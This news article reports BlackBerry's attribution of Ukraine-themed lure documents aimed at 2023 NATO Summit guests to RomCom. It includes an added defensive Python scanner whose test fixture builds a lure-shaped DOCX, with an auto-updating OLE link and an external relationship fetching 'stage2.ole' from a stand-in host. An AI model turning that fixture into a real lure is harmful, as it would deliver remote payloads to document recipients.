RomCom Hackers Target NATO Summit

The Russia-linked threat actor RomCom has been targeting organisations supporting Ukraine in a recently identified cyber operation. Researchers at BlackBerry found two malicious documents, submitted from an IP address in Hungary, that were used as lures against an organisation supporting Ukraine abroad. The targets include guests of the 2023 NATO Summit, which took place on July 11-12.

Based on the threat actor’s TTPs (tactics, techniques and procedures), network infrastructure and code similarity, BlackBerry attributes the campaign to RomCom. The malware delivered is tracked as RomCom RAT.

The lure documents pose as material lobbying for Ukraine’s NATO accession and assessing the likelihood of Ukraine becoming a member of the organisation in the future. The NATO Summit itself discussed the war in Ukraine, Ukraine’s accession and Sweden’s recently announced membership.

RomCom created the malicious documents and tested its delivery chain on June 22. The documents rely on embedded RTF files and OLE objects to collect system information and deliver the RomCom remote access trojan.
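The embedding chain described above (a DOCX carrying an RTF part, which in turn carries an OLE object) can be triaged without ever opening the file in Word. The Python script below is an added example, not code from BlackBerry or from this article. It builds a constructed DOCX in memory that mimics that layout and then walks the zip looking for RTF parts with OLE control words, external targets recovered from the hex in \objdata, non-hyperlink relationships with TargetMode="External", and altChunk references in the document body. The part names, the altChunk relationship, the .invalid host and the OLE payload bytes are all invented for the demo; none of them are indicators from the RomCom campaign.

```python
"""Triage a DOCX for embedded RTF parts that carry OLE objects.

Added example (not code from BlackBerry or from the article). The DOCX it
scans is constructed in memory below; no real lure document is included.
"""
import io
import re
import zipfile

OLE_CFB_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"  # OLE2 compound file header
RTF_MAGIC = b"{\\rtf"
# RTF control words that introduce embedded or linked OLE objects
RTF_OLE_WORDS = ("object", "objemb", "objautlink", "objlink", "objupdate", "objclass", "objdata")
OBJDATA_RE = re.compile(rb"\\objdata\s*([0-9A-Fa-f\s]+)")
# URL or UNC path inside the decoded object data: a linked object fetching a remote resource
EXTERNAL_REF_RE = re.compile(rb"(?:https?://|file://|\\\\)[\x20-\x7e]{3,}")


def analyse_rtf(rtf: bytes) -> dict:
    """Count OLE control words and recover external references from \\objdata hex blobs."""
    words = {w: rtf.count(b"\\" + w.encode()) for w in RTF_OLE_WORDS}
    refs = set()
    for match in OBJDATA_RE.finditer(rtf):
        hexdata = re.sub(rb"\s", b"", match.group(1))
        try:
            blob = bytes.fromhex(hexdata.decode("ascii"))
        except ValueError:  # truncated or odd-length hex: nothing to decode
            continue
        refs.update(r.decode("ascii", "replace") for r in EXTERNAL_REF_RE.findall(blob))
    return {"ole_words": {k: v for k, v in words.items() if v}, "external_refs": sorted(refs)}


def scan_docx(docx: bytes) -> list:
    """Walk every part of the DOCX zip and report what an analyst should look at."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx)) as zf:
        for name in zf.namelist():
            data = zf.read(name)
            if data.lstrip().startswith(RTF_MAGIC):
                info = analyse_rtf(data)
                # \objupdate forces the object to refresh on open; an external target
                # in \objdata means that refresh reaches out over the network
                suspicious = "objupdate" in info["ole_words"] or bool(info["external_refs"])
                findings.append({"part": name, "kind": "rtf", "suspicious": suspicious, **info})
            elif data.startswith(OLE_CFB_MAGIC):
                # a raw OLE file stored as a part is an embedded object; always worth a look
                findings.append({"part": name, "kind": "ole", "suspicious": True})
            elif name.endswith(".rels"):
                for rel in re.findall(rb"<Relationship\b[^>]*>", data):
                    if b'TargetMode="External"' not in rel:
                        continue
                    target = re.search(rb'Target="([^"]*)"', rel)
                    findings.append({"part": name, "kind": "external-rel",
                                     "target": target.group(1).decode("ascii", "replace") if target else "",
                                     # ordinary hyperlinks are external too; anything else gets flagged
                                     "suspicious": b'/hyperlink"' not in rel})
            elif name == "word/document.xml" and b"<w:altChunk" in data:
                # altChunk is how Word pulls a foreign-format part (such as RTF) into the body
                findings.append({"part": name, "kind": "altchunk", "suspicious": True})
    return findings


def triage(docx: bytes) -> list:
    """Names of the parts that warrant analyst attention."""
    return [f["part"] for f in scan_docx(docx) if f["suspicious"]]


def build_sample_docx() -> bytes:
    """Constructed sample: a minimal DOCX whose body pulls in an RTF part via altChunk;
    the RTF holds an auto-updating linked OLE object whose data points at a UNC path.
    Part names, relationship ids, host (.invalid TLD) and payload bytes are invented."""
    objdata = b"\x01\x05\x00\x00\x02\x00\x00\x00" + b"\\\\example.invalid\\share\\payload.ole\x00"
    rtf = (b"{\\rtf1\\ansi{\\object\\objautlink\\objupdate\\objw1\\objh1"
           b"{\\*\\objclass Package}{\\*\\objdata " + objdata.hex().encode() + b"}}}")
    document_xml = (b'<?xml version="1.0" encoding="UTF-8"?>'
                    b'<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" '
                    b'xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">'
                    b'<w:body><w:altChunk r:id="rId9"/></w:body></w:document>')
    rels = (b'<?xml version="1.0" encoding="UTF-8"?>'
            b'<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
            b'<Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/aFChunk" Target="chunk.rtf"/>'
            b'<Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" '
            b'Target="http://example.invalid/stage2.ole" TargetMode="External"/>'
            b'</Relationships>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", b'<?xml version="1.0"?>'
                    b'<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("word/document.xml", document_xml)
        zf.writestr("word/_rels/document.xml.rels", rels)
        zf.writestr("word/chunk.rtf", rtf)
    return buf.getvalue()


if __name__ == "__main__":
    sample = build_sample_docx()
    for finding in scan_docx(sample):
        print(finding)
    print("suspicious parts:", triage(sample))
```

Run it as a script to see the findings for the constructed sample, or pass the bytes of a real document to scan_docx for triage. This is a structural check, not a signature for RomCom RAT: it tells you that a document contains the RTF-inside-DOCX, OLE-object-with-external-target shape, which is rare in organic documents and is the point at which a sandbox detonation or manual OLE analysis is justified.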

The lure documents are expected to be distributed by spear-phishing to supporters of Ukraine. The group, also tracked as Void Rabisu and Tropical Scorpius, was previously believed to be financially motivated; recent shifts in its operations and targeting indicate it is likely working for the Russian government.

RomCom has attacked targets in Ukraine, as well as European conferences, defense companies, and municipalities helping Ukrainian refugees.

Since at least October 2022, the threat actor’s RomCom backdoor has been used in attacks targeting Ukraine, including users of Ukraine’s Delta situational awareness program and organisations in Ukraine’s energy and water utility sectors.

Sources: BlackBerry, Ukraine World Congress, Bleeping Computer, HackRead, OODA Loop, Security Week

Image: Danzig-Hamburg

